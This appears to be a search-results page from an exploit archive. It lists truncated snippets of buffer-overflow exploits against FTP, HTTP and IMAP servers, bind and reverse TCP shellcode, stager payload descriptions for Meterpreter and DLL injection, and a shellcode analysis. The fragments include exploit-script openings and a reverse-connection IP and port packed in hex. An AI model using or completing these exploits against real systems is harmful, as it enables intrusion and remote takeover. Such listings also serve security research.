7259 matches found
PCMAN-FTP-2.07-CWD
Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv iflenargv != 4: print "USAGE: %s host " % argv0 exit1 else: store...
Ultra-Mini-HTTPD-1.21---POST
Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request Date: 16 Feb 2014 Exploit Author: Sumit Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on: Windows XP Professional SP3 A buffer overflow is triggere...
EudoraQualcomm-WorldMail-9.0.333.0
PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service Preauthentication Buffer Overflow. - Tested on: Windows Server 2003 SP1. - SEH gets overwritten at 749 bytes when using UID command. Only 79 bytes are left after SEH, so the shellcode was placed before SEH and backward jump is used...
PCMAN-FTP-2.07
Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow unauthenticated Date: Feb 19, 2014 Exploit Author: Sumit Version: 2.07 Tested on: Windows XP Professional SP3 Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command import socket import...
python-socket.recvfrom_into()
Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912 import struct def offo: return struct.pack'L',o reverseIP = '\xc0\xa8\x04\x34' '\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' shellcode from exploit-db.com,...
Acunetix-Web-Vulnerability-Scanner
Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/ /!\ Author is not responsible for any damage you cause This POC is for educational purposes only Video: https://www.youtube.com/watch?v=RHaMx8K1GeM while True: try: choice = intrawinput"...
Kolibri-WebServer-2.0-GET
Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit Exploit Author : Revin Hadi S Date : 14/07/2014 Vendor : http://www.senkas.com Version : 2.0 import socket, sys help = """Kolibri WebServer 2.0 Get Request SEH Exploit Target 1Windows XP SP2 Eng & Windows 2003 SP2 Eng 2Windows 7 SP1 En...
HTML-Help-Workshop-1.4
Date: 31/08/2014 Author: mr.pr0n @pr0n Homepage: http://ghostinthelab.wordpress.com/ Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx Version: 1.4 Tested on: Windows XP SP3 / Windows 7 Pro import subprocess junk = "A" 832 Junk bytes nseh =...
Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appea...
VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket wil...
Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as...
Windows Inject DLL, Hidden Bind Ipknock TCP Stager
Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will...
Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping...
Windows Command Shell, Hidden Bind Ipknock TCP Stager
Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as...
x64 Linux bind TCP port shellcode 81 bytes, 96 with password
x64 Linux bind TCP port shellcode 81 bytes, 96 with password. Shellcode exploit for lin_x86-64 platform / Author: Sean Dillon Copyright: (c) 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password Assemble...
x64 Linux reverse TCP connect 77 to 85 bytes, 90 to 98 with password
x64 Linux reverse TCP connect 77 to 85 bytes, 90 to 98 with password. Shellcode exploit for lin_x86-64 platform / Author: Sean Dillon Copyright: (c) 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password...
Shellcode analysis of an EXCEL vulnerability sample - vulnerability warning - the black bar safety net
0x00 Cause: Recently I got an EXCEL sample, allegedly a 0day that gets past all anti-virus; after analyzing it I was disappointed, as this is an old vulnerability from 2012, not a 0day. Although it did not turn out to be a 0day, the shellcode in this sample is still quite distinctive, it is indeed...
linux/x64 bind TCP port shellcode 81 bytes
x64 Linux bind TCP port shellcode 81 bytes, 96 with password / Author: Sean Dillon Copyright: (c) 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password Assembled Size: 81 bytes, 96 with password Tested...
linux/x64 reverse TCP connect shellcode 85 bytes
x64 Linux reverse TCP connect shellcode 77 to 85 bytes, 90 to 98 with password / Author: Sean Dillon Copyright: (c) 2014 CAaNES, LLC. http://caanes.com Release Date: December 19, 2014 Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password Assembled Size: 77 - 85 bytes, 90 ...
Linux x86 - rmdir 37 bytes
Linux x86 - rmdir 37 bytes. Shellcode exploit for linux platform / Title: Linux x86 rmdir - 37 bytes Author: kw4 useful for testing purposes 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 6f 6c 68 6f push $0x6f686c6f 8048068: 68 68 6f 6c 68 push $0x686c6f68 804806d: 68 ...